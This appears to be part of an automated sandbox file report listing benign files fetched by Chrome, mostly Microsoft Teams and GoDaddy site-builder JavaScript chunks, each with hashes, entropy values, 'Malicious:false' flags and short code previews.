                                                                                                                                                                                                                          Entropy (8bit):4.388142440742065
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:jevujZXq2ntY4Z1Vb840r7/m9T9HuxxnoSZgoujXppuLA4QiXZ5:zxZ1Vb840nSYxdKDK
                                                                                                                                                                                                                          MD5:C7D47DB81BA346D771FF379F1D41F23F
                                                                                                                                                                                                                          SHA1:41BEB1B4914E509149A15C4A01BB4D2D4F2340C5
                                                                                                                                                                                                                          SHA-256:668A3A7EC03077EF1CCFFF237FBA222593D0C289B755B503E231AB425FCEB569
                                                                                                                                                                                                                          SHA-512:82908DE9C0CB204F487F15E41CBF97A8323424E3A15520EA217D36618597586618905D5D4C4CE4EB314736F9C43F26F60AD03ECFF53AEF86D04E8CBE28B6BA3E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/378200-5bdb80e2ca6adf70.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[378200],{378200:(a,l,Z)=>{Z.d(l,{bBY:()=>h,lt0:()=>c,yOJ:()=>m,gT3:()=>v,BqX:()=>M,B$Y:()=>H,xBE:()=>A,n7r:()=>V,fZ1:()=>r,dDX:()=>i,FEK:()=>U,$Ke:()=>d,nX0:()=>u,BJl:()=>n,wlb:()=>L,qEH:()=>t,xU9:()=>R,NfP:()=>o,u50:()=>g,wIv:()=>S,mFV:()=>F,eFJ:()=>s,TXX:()=>P,bkw:()=>C,mKe:()=>p,qW2:()=>f,eH5:()=>b,ad_:()=>k,fQJ:()=>y,D$b:()=>O,ifC:()=>T,mtw:()=>w,WGt:()=>B,y2l:()=>x,cGG:()=>q,a3K:()=>I,zPH:()=>D,d5R:()=>E,xPN:()=>K,dGC:()=>N,QOI:()=>Q,iN6:()=>X,opr:()=>J,aUx:()=>_,HC5:()=>j,vpp:()=>G,maG:()=>W,MJQ:()=>Y,BHV:()=>$,VC0:()=>z,CQz:()=>aa,uqx:()=>la,sPT:()=>Za,OYi:()=>ea,Q7X:()=>ha,cX9:()=>ca,tvn:()=>ma,VeZ:()=>va,OoO:()=>Ma,eEF:()=>Ha,FfV:()=>Aa,bBX:()=>Va,I7h:()=>ra,WiT:()=>ia,jU7:()=>Ua,jNX:()=>da,Luu:()=>ua,Zi6:()=>na,g6R:()=>La,cKq:()=>ta,b$F:()=>Ra,OfM:()=>oa,zw9:()=>ga,nbT:()=>Sa,oV5:()=>Fa,K4g:()=>sa,UEw:()=>Pa,E68:()=>Ca,pXb:()=>pa,tmX:()=>fa,VIN:()=>ba,tBY:()=>ka,ktJ
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:MS Windows icon resource - 18 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):172066
                                                                                                                                                                                                                          Entropy (8bit):4.32521391566617
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:Dg7Z3gHhMIW7F3TGUhxkZ1OgbC6kStqJ1L3mC3g9BQ0MRB3R9HwXOeOkccOOOOJW:07Z32hLWNTJhxiQACPStqzZw9ep3RV
                                                                                                                                                                                                                          MD5:247D14144A313421D8D84AA0EA54D249
                                                                                                                                                                                                                          SHA1:83BEFDD6EBA57FAA3D3074AA08A28A4E8D75076A
                                                                                                                                                                                                                          SHA-256:2D5AA67B8ACE13A94FD09316787E3C9ABA2ADAC767B6E2AB769A2265A2AD20F0
                                                                                                                                                                                                                          SHA-512:F2D79A2A75148EFAF90A4A92980E781B1F94A4A1034383FFE5749983085EF7EAFA29D4804094296B212795501B4B4A126BC47C24A91B60C24104BC4B24D99565
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:...... ..........&...........(.......@@......(...6...00..........^... ...........*..........h....2........ .$5...8..``.... .....:m..PP.... ..g......HH.... ..T...i..@@.... .(B..R...<<.... .H:..z...00.... ..%...:..((.... .h...j`.. .... ......z........ .....z......... ............... .h.......(... ...@....................................................................................................................................................................................................................................DDD|...||x...||||||H...............L...|||..|||.|||H...............L...|||..|||.|||H...............L...|||..|||.|||H...............L...|||..|||.|||H...............L........|.....|@.............L...||x..|||||||H..................|||.............................||x..........................................................................................................................................................................................................
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):162009
                                                                                                                                                                                                                          Entropy (8bit):5.074837765032432
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:F9Qax3fp52cF45QzZbQObIxVkCeVfNdkNEmmhDI:F9QyfpocF45QzZbQxTeVfNdEEzDI
                                                                                                                                                                                                                          MD5:B1E4A13B68EEF590317AC2C27D5CEF27
                                                                                                                                                                                                                          SHA1:13AFE7905A46EC9E27150423F2C0CE0C90923E2E
                                                                                                                                                                                                                          SHA-256:C25D8632D4D9B961B2D3E73C3B912C28D096B43223D64A2A9444E5BF345E56DE
                                                                                                                                                                                                                          SHA-512:FF302040565F5907567661184A4C854393269E960AA0926EB041236ACA954223E9CE643CEC66CCA2E016569503C1BCF8E2AA0B9FF4C9F9E5C32F03F926D8A68C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[876152],{876152:e=>{e.exports=[{types:{ModelDirectiveScope:[5,["SERVER_RESOLVERS","BROWSER_RESOLVERS","CLIENT_RESOLVERS"]],DisplayWaterMark:[5,["On","Off","Fade"]],CommunityNotificationSettings:[2,{id:10,inviteOnNetworkEmailOptIn:2,announcementEmailOptIn:2}],HardwareOutDevice:[2,{id:10,description:6,isAvailable:7,callId:5,participantId:5,localStream:2,participantStreamId:3,videoType:"StreamType",format:1,formats:11,participantDisplayName:1}],PtzControlCommand:[5,["Reset","ZoomIn","ZoomOut","PanLeft","PanRight","TiltUp","TiltDown"]],TranscriptEditType:[5,["Speaker"]],TranscriptDownloadFormat:[5,["Vtt","Docx","Pdf"]],DriveRecipientInput:[6,{email:1,alias:1,objectId:1}],LinkScopeInput:[5,["anonymous","organization","users","existingAccess"]],LinkTypeInput:[5,["view","edit"]],CreateShareLinkOptions:[6,{deferRedeemEnabled:7,partialSuccessEnabled:7}],PptSharingContentInput:[6,{id:10,name:6,type
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (55911)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):56038
                                                                                                                                                                                                                          Entropy (8bit):5.393720302305123
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:Z7ZXRRWXosAEKPe1ndtR1493c1cu9uI0+qZEyHDVeq1MuBDilTek6cjzp6Og/Rmb:lxRardvQUcu9pXaQZT8pS2N+Ip6KI
                                                                                                                                                                                                                          MD5:47AE6B51B036DCBD0E307F8DFCB18EA8
                                                                                                                                                                                                                          SHA1:23EBFEFC3E8C38529466DA1ECC72E501D8D03D72
                                                                                                                                                                                                                          SHA-256:F0602A7D2715902B437AA80C3F44240C0A5FD0ECCECABC77A5C14AD37A97D8F8
                                                                                                                                                                                                                          SHA-512:EE5E76FA0F046A21D84EE7AB40EAF98BBFFBBE1A59701FDFBB84B39AC4BB8073F816CA6C6E15AF84B9B57F6B660624554C4AA6098E6DB40211D9C964FE4762D5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/services-sharepoint-share-0450343a421a4d79.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[17387],{48977:(e,t,r)=>{r.d(t,{X:()=>o,K:()=>a});var i=r(554186);const n="\r\n",s="ump=1",o=e=>async t=>e(a(t)),a=e=>{const t=(0,i.v4)();return{...e,url:l(e.url),headers:{"Content-Type":`multipart/form-data;boundary=${t}`},body:c(e,t),method:"POST"}},l=e=>e.match(/[?]/)?`${e}&${s}`:`${e}?${s}`,c=(e,t)=>{const r=`--${t}${n}`,i=`--${t}--`,s=`Content-Disposition: form-data;name=data${n}`,o=`Content-Type: application/json${n}`,a="POST"!==e.method?`X-HTTP-Method-Override: ${e.method}${n}`:"",l=h(e),c=e.body?`${e.body}${n}`:`{}${n}`;return`${r}${s}${o}${l}${a}${n}${c}${i}`},h=e=>{const t=e.headers;return t?Object.keys(t).map((e=>"Content-Type"===e?"":`${e}: ${t[e]}${n}`)).join(""):""}},34117:(e,t,r)=>{r.r(t),r.d(t,{DriveItemShareService:()=>qe,FileContentService:()=>ke,FileMetadataService:()=>xe,FileRedeemAPIContext:()=>ce.o1,FileRedeemAPIHeaderPreferOptions:()=>ce.gl,FileRedeemMul
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                          Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):71331
                                                                                                                                                                                                                          Entropy (8bit):4.3735714624398625
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:+MCRhlSQwwOZaaRUgrBx3IzKkzq9JkEkZj2A:BCntQeKKQJ4Zj2A
                                                                                                                                                                                                                          MD5:2D397C60A3F6D5F4F77AF5ADE73BDAE3
                                                                                                                                                                                                                          SHA1:0408DF6B9E7A1BB292EA9426CFA160B3C19F7500
                                                                                                                                                                                                                          SHA-256:91DA53C692B4389ADF7BB5E7B17C1B6D42A3BEE56E76D26B0E2CA1D022E5B5A9
                                                                                                                                                                                                                          SHA-512:A27A1E6021459EBB477C9A1D7C36212BAC4D956A5FAE20A6BD58A19BA933C20DBE03AB0E19EB2DD1F03513D4ED16617A538836CF7E87FE9D9D7D5DFC738A6802
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/786989-55e0f9d38c65dac3.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[786989],{786989:(a,l,Z)=>{Z.d(l,{PWb:()=>c,B2b:()=>e,CQn:()=>m,w9k:()=>v,IAD:()=>M,o01:()=>H,nKv:()=>V,F6M:()=>A,xgG:()=>i,dZd:()=>t,HNx:()=>r,dZw:()=>U,xyI:()=>L,xV4:()=>d,b3q:()=>u,zcm:()=>g,OBm:()=>s,caN:()=>R,LSV:()=>T,dOY:()=>o,VPN:()=>F,PJ4:()=>n,k36:()=>C,yKF:()=>S,Qnz:()=>b,slQ:()=>x,gbh:()=>f,yqm:()=>p,TL:()=>k,b2m:()=>B,Zyz:()=>q,n4W:()=>P,$gc:()=>O,zrg:()=>w,Y8E:()=>W,ooj:()=>y,YyX:()=>z,CT4:()=>D,$A0:()=>_,bbI:()=>E,Brd:()=>$,bbB:()=>K,sVv:()=>N,uwv:()=>Q,dwb:()=>I,Hqt:()=>Y,exC:()=>J,qbk:()=>X,hO5:()=>j,tnW:()=>G,gu4:()=>aa,U0q:()=>la,qHH:()=>Za,uVS:()=>ha,aUd:()=>ca,ucc:()=>ea,Km0:()=>ma,mkh:()=>va,QbX:()=>Ma,_uv:()=>Ha,leE:()=>Va,vCx:()=>Aa,oA2:()=>ia,y3C:()=>ta,msU:()=>ra,GU8:()=>Ua,Dqj:()=>La,TXo:()=>da,_Vv:()=>ua,MqR:()=>ga,rqr:()=>sa,FeF:()=>Ra,dv:()=>Ta,$ZY:()=>oa,CfS:()=>Fa,unC:()=>na,d9o:()=>Ca,lQL:()=>Sa,Ozu:()=>ba,EyP:()=>xa,z49:()=>fa,cP8:()=>pa,gDx:(
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (453)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):507
                                                                                                                                                                                                                          Entropy (8bit):5.441630472495487
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:cTiBSyk+jo5Q8KWOT1DoD3BMXkKOr4SJdC+THr+pWTDX:cTiBLbTnBDqMXSr4SJ8SHrIYDX
                                                                                                                                                                                                                          MD5:41989626C6305D55A0AE7990D7BCB539
                                                                                                                                                                                                                          SHA1:D59C07C80C37F0519C860F802DD9033AB7622A5A
                                                                                                                                                                                                                          SHA-256:4FFB85F3D6A01D0497543DA0E4D003F32FD86304CE931803E542DAF561FD17E9
                                                                                                                                                                                                                          SHA-512:0CD58A5E318F4E689815E369465A826F3B8BD4AF97961A14A229A293E42A1E352E1E0921151FDA0566EBC7D80AE52FCE4EA7A5677DC1563638D22D743C63073D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-overlayTypes-3c1643f3.js
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-overlayTypes-3c1643f3.js",["exports"],(function(e){"use strict";const{headerTreatments:{FILL:o,FIT:n,INSET:t,BLUR:a,LEGACY_BLUR:c,WIDE_INSET:d}}=(global.Core||guac["@wsb/guac-widget-core"]).constants;e.A="accent",e.B=a,e.C="category",e.F=o,e.I="Image",e.L=c,e.N="neutral",e.P="primary",e.S="Slideshow",e.V="Video",e.W=d,e.a="none",e.b=n,e.c=t,e.d="None",e.e="light_dark"})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-overlayTypes-3c1643f3.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):379727
                                                                                                                                                                                                                          Entropy (8bit):5.446662316381847
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:tRX90HwF9lV1LzACQoiifB3itQt4A8TJt6cQ4FZsNCloGnmTdA7nqsCrm1lSTl3:DXSHwIoiifB3itQt4A8TKWoeNksSh
                                                                                                                                                                                                                          MD5:4B2B7C91BE6969BFF259727068C67652
                                                                                                                                                                                                                          SHA1:038D94BDBE621FF5BDA3A6998A07AF1B755D26C3
                                                                                                                                                                                                                          SHA-256:BD2205DDD0A59778B8FD5A0EB70BEC8D67A86A4C5D26F9AF3CB9A41559C89EC4
                                                                                                                                                                                                                          SHA-512:A6F88890FD0C8BD05FCB3E09CC5538074C99DE1B74B361AB74B608700B9A7A27384B6E324F831B0D751DCF10F1E5556BB15773A9D83D483BC44F95A91E05CA39
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[889503,583674,361293],{583674:(e,t)=>{function i(e){return null!=e&&"function"==typeof e.then}function r(e){return null!=e&&"function"==typeof e.cancel}function n(e,i){if(!t.config.catchExceptions)return e();try{return e()}catch(e){return i(e)}}Object.defineProperty(t,"__esModule",{value:!0}),t.config={exceptionsToConsole:!0,catchExceptions:!0,traceEnabled:!1,exceptionHandler:void 0,unhandledErrorHandler:function(e){throw e}},t.fromThenable=function(e){var t=g();return e.then((function(e){t.resolve(e)}),(function(e){t.reject(e)})),t.promise().thenAsync((function(e){return e}))};var s,o=[],a="undefined"!=typeof setImmediate;function l(e){o.push(e),1===o.length&&(a?setImmediate(c):setTimeout(c,0))}function c(){var e=o;o=[];for(var t=0;t<e.length;t++)e[t]()}function g(){return new s.SyncTask}function d(e){return(new s.SyncTask).resolve(e).promise()}function u(e){var t=g(),n=!1;r
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1317)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):1425
                                                                                                                                                                                                                          Entropy (8bit):5.322530262992215
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:wp3sp38ngM5xx8FsJeybSOPqJRPmC0vkjaLd76hpa8AP3LipufqJNtPa5eEpa8Ay:wp3sp3H2xOs36ReC0cjaLt3quq/keJqn
                                                                                                                                                                                                                          MD5:1B6A88F9DD5747B566119263B842D4F0
                                                                                                                                                                                                                          SHA1:36FD7F0500944CFE6158015CD20049DA6220F9A9
                                                                                                                                                                                                                          SHA-256:E778D24A4A48AC146531FD90136935295D5FC2030E7565A0F4ADE82827E38C13
                                                                                                                                                                                                                          SHA-512:FB44C08F3DD03D9F0CEAB3B611079FA374AFEB235C4925A1C8750E768BEECAD43F421383148D1A59C3A963C46280B7DE95D73FF3E16F103755B3B5FA2B20C863
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/990521-e9325ffc81da8165.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[990521],{990521:(e,s,a)=>{a.d(s,{T:()=>n});var l=a(957032),C=a(395225),t=a.n(C),c=a(485529),i=a(829289);const n=(0,c.Ke)({svg:({classes:e})=>(0,l.Y)("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:e.svg,children:[(0,l.Y)("g",{className:t()(i.Q.outline,e.outlinePart),children:[(0,l.Y)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M8 2C6.89543 2 6 2.89543 6 4V14C6 15.1046 6.89543 16 8 16H14C15.1046 16 16 15.1046 16 14V4C16 2.89543 15.1046 2 14 2H8ZM7 4C7 3.44772 7.44772 3 8 3H14C14.5523 3 15 3.44772 15 4V14C15 14.5523 14.5523 15 14 15H8C7.44772 15 7 14.5523 7 14V4Z"}),(0,l.Y)("path",{d:"M4 6.00001C4 5.25973 4.4022 4.61339 5 4.26758V14.5C5 15.8807 6.11929 17 7.5 17H13.7324C13.3866 17.5978 12.7403 18 12 18H7.5C5.567 18 4 16.433 4 14.5V6.00001Z"})]}),(0,l.Y)("g",{className:t()(i.Q.filled,e.filledPart),children:[(0,l.Y)("path",{d:"M6 4C6 2.89543 6.8954
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2467)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):2592
                                                                                                                                                                                                                          Entropy (8bit):4.845876308583554
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:wp3sp3OlsgW0ueB6NsiI1/16xPxUBnBOr1P/tdwZf/TvopbpQDGODGjkWWpC9tje:OsT8YVDwZXad/+r
                                                                                                                                                                                                                          MD5:016A2F33A3DE3F6B0C9DD22D2E891D1F
                                                                                                                                                                                                                          SHA1:0DD5EAC7743D24C1657A84E0CAB23E4E3034E9E3
                                                                                                                                                                                                                          SHA-256:6A2E762D7B9A735DB69AFD281D4B45D0910E7F1CDC5E3F1ECEE6D19170FE65C4
                                                                                                                                                                                                                          SHA-512:478CA92EF47710B70B4C640793862F8041AE6E1592D073E678688DE03F70692BB27405C37A414769BA0B2DB18B39B1296E7C13AC1D286D44DFC2C11EC4F0E0B5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/recurrence-locale-en-us-651b2b023666e1f6.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[951405],{568561:(e,r,t)=>{t.r(r),t.d(r,{default:()=>n});const n={namespace:"recurrence",locale:"en-us",translations:{and_separator_format:"{{value1}} and {{value2}}",comma_separator_format:"{{value1}}, {{value2}}",meeting_recurrence_pattern_daily_mf:"{interval, plural, =1{Occurs daily} =2{Occurs every other day} other{Occurs every # days}}",meeting_recurrence_pattern_first_weekInMonth:"First",meeting_recurrence_pattern_first_weekInMonth_lower_case:"first",meeting_recurrence_pattern_fourth_weekInMonth:"Fourth",meeting_recurrence_pattern_fourth_weekInMonth_lower_case:"fourth",meeting_recurrence_pattern_last_weekInMonth:"Last",meeting_recurrence_pattern_last_weekInMonth_lower_case:"last",meeting_recurrence_pattern_monthly_mf:"{interval, plural, =1{Occurs every month on day {day}} =2{Occurs every other month on day {day}} other{Occurs every # months on day {day}}}",meeting_recurr
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):91927
                                                                                                                                                                                                                          Entropy (8bit):5.228215185663642
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:+XrMjuTJeXV5/90Nhb149+K2LosaygogyNxzreZ1Wn8BQI0SswV8s+1ibC5YGhFs:SoOtowNxW00
                                                                                                                                                                                                                          MD5:86C7B332C95B8F0D3D5C4C00C0520C7D
                                                                                                                                                                                                                          SHA1:C12156B4AA445E131FA55E572C96F137829F497F
                                                                                                                                                                                                                          SHA-256:429009A6AE8C75F450AA714F2CDB70DF79A0D46D41705EFB30598AFDE0A9813D
                                                                                                                                                                                                                          SHA-512:088A1EA50454765B93AFA30FC8748A5264306D82191B898C335210067B58A5FEF20726028370BDF10DFBA01C46C8BB4F1C9C65AEB63146EBF748F1BB928DC7D3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[990536],{474977:(t,e,a)=>{a.d(e,{R:()=>m});var o=a(519485),i=a(364819),n=a(440320);class s{constructor(t){this.modifier="alt",this.keyMaps=[],this.originalKeyMaps=[],this.commandIdToAreaDescription=new Map,this.isVirtualStrategy=!1,this.keyMaps=[],this.addCommandIdToAreaDescription("ShowShortcuts",["Global"],"shortcut_show_shortcuts","General",!0),this.addCommandIdToAreaDescription("GoToPowerBar",["Global"],"shortcut_open_search","General",!0),this.addCommandIdToAreaDescription("NewChat",["Global"],"shortcut_compose_new","General",!0),this.addCommandIdToAreaDescription("PopoutNewChat",["Global"],"shortcut_pop_out_new_chat","General",t.enableShortcutToOpenNewChatInPopout),this.addCommandIdToAreaDescription("PopoutSelectedChat",["Global"],"shortcut_popout_selected_chat","General"),this.addCommandIdToAreaDescription("OpenLeftRailFilter",["Global"],"shortcut_open_left_rail_filter
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (47016)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):47124
                                                                                                                                                                                                                          Entropy (8bit):5.288745142117651
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:kCVHH8encpTYeGq1q0V0UDA8MnSj5udSTYSzPz2:bH8enclYpmJV5DA8MnSj5udgYYa
                                                                                                                                                                                                                          MD5:F6D80FCD9D1F9EAFB54E2B26C2A1BE5A
                                                                                                                                                                                                                          SHA1:ACF87FC3F2AF50DDCF4FCABB5BCDC8DAE6E878D3
                                                                                                                                                                                                                          SHA-256:511C92C1498EE0E4576F214C41C7499DD9B8A2CB94DF79934A48F0707B3B1AED
                                                                                                                                                                                                                          SHA-512:A1BBF2851B958F5F398EBBEB2629607E63DA99A7849628657CC70F9855827A56E53E98C55AF6F041AE3B0E71DB6ABA6E4066712B5D93DDD903F5CC6275AA425A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[985157],{943015:(e,t,r)=>{"use strict";function n(e,t){var r="undefined"!=typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(r)return(r=r.call(e)).next.bind(r);if(Array.isArray(e)||(r=function(e,t){if(!e)return;if("string"==typeof e)return i(e,t);var r=Object.prototype.toString.call(e).slice(8,-1);"Object"===r&&e.constructor&&(r=e.constructor.name);if("Map"===r||"Set"===r)return Array.from(e);if("Arguments"===r||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(r))return i(e,t)}(e))||t&&e&&"number"==typeof e.length){r&&(e=r);var n=0;return function(){return n>=e.length?{done:!0}:{done:!1,value:e[n++]}}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function i(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n}function o(e,t){for(var r=0
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65269)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):312247
                                                                                                                                                                                                                          Entropy (8bit):5.502991899470642
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:crKM0OMeOJTW+0V0AorJwXeBHh0qdDj1fJmCmT9la8u2tAqXDz7:crp0hefb0HYeB2qdDjlJKTPM2X7
                                                                                                                                                                                                                          MD5:5A57183C018F22F0E5ECC437479E0758
                                                                                                                                                                                                                          SHA1:173FD5E2A40A8585BD72EDFCFE3E89CAF830CFFD
                                                                                                                                                                                                                          SHA-256:A72D05072E625164936884B4D4C86E4C5FDE7F75A54FC68FC328D0C3C62D206E
                                                                                                                                                                                                                          SHA-512:2242DB8F10FCA2DD061EE0D45EB6CF739A0FEF7FE8A5907E421A78717A49D132ACDD9C7761284DD479FC21B954E29EE4063EB2519D75C93221AF607D9CC8E9FC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.47.0.js
                                                                                                                                                                                                                          Preview:/*! For license information please see UX.4.47.0.js.LICENSE.txt */.var Core;(()=>{var e={687:function(e,t,n){var r;e=n.nmd(e),function(){function o(){return hn.Date.now()}function a(e,t,n){switch(n.length){case 0:return e.call(t);case 1:return e.call(t,n[0]);case 2:return e.call(t,n[0],n[1]);case 3:return e.call(t,n[0],n[1],n[2])}return e.apply(t,n)}function l(e,t){for(var n=-1,r=null==e?0:e.length;++n<r&&!1!==t(e[n],n,e););return e}function i(e,t){for(var n=null==e?0:e.length;n--&&!1!==t(e[n],n,e););return e}function u(e,t){for(var n=-1,r=null==e?0:e.length;++n<r;)if(!t(e[n],n,e))return!1;return!0}function s(e,t){for(var n=-1,r=null==e?0:e.length,o=0,a=[];++n<r;){var l=e[n];t(l,n,e)&&(a[o++]=l)}return a}function c(e,t){return!(null==e||!e.length)&&-1<v(e,t,0)}function f(e,t){for(var n=-1,r=null==e?0:e.length,o=Array(r);++n<r;)o[n]=t(e[n],n,e);return o}function d(e,t){for(var n=-1,r=t.length,o=e.length;++n<r;)e[o+n]=t[n];return e}function p(e,t,n,r){var o=-1,a=null==e?0:e.length;for(r&
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):221
                                                                                                                                                                                                                          Entropy (8bit):5.32955468303281
                                                                                                                                                                                                                          Encrypted:false
